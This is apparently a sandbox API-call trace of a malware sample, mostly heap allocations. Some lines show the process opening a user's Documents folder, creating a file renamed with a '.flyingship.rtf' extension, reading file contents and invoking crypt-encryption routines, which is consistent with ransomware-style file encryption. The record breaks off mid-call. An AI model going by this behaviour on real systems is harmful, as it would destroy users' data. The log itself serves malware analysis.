[0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0179.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0179.840] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.840] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.841] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0179.841] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0179.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0179.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0179.842] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0179.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0179.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.843] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ynsvrvaq.flyingship.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0179.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0179.845] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0179.845] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0179.846] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.846] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0179.850] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x84f, lpOverlapped=0x0) returned 1 [0179.850] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0179.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1084f) returned 0xbea018 [0179.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0179.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1084f) returned 0xbfa870 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.853] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.853] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1084f) returned 0xbea018 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0179.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.854] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0179.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.854] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1084f) returned 0xbea018 [0179.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0179.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0179.855] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0179.855] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1084f) returned 0xa5f008 [0179.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0179.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.857] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.858] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0179.858] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0179.858] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.858] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.859] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2798 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.860] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0179.860] RtlAllocateHeap 